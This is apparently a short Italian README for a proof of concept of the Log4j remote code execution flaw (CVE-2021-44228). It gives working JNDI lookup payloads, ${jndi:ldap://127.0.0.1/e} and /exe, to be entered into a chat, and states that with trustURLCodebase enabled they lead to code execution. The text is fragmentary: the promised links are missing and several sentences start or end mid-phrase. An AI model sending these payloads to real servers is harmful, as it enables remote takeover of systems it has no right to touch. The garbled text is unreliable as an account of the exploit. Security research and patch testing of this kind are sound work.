
Log4j-RCE (CVE-2021-44228) Proof of Concept con informazioni aggiuntive
Questa è una proof of concept della RCE di log4j.
Ecco alcuni link per la CVE-2021-44228:
Questo bug riguarda quasi tutte le versioni di log4j2 e forse anche quelle di log4j1. La versione consigliata da utilizzare è 2.15.0 che corregge l'exploit.
${jndi:ldap://127.0.0.1/e} nella chat. Se c'è un socket aperto sulla porta 389, logj4 prova a connettersi e blocca ulteriori comunicazioni finché non si verifica un timeout.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, che è un oggetto stringa serializzato dal server ldap.
${jndi:ldap://127.0.0.1/exe} nella chat. Se -Dcom.sun.jndi.ldap.object.trustURLCodebase=true è impostato su true, avverrà l'esecuzione remota di codice.
Questo progetto è solo a scopo educativo.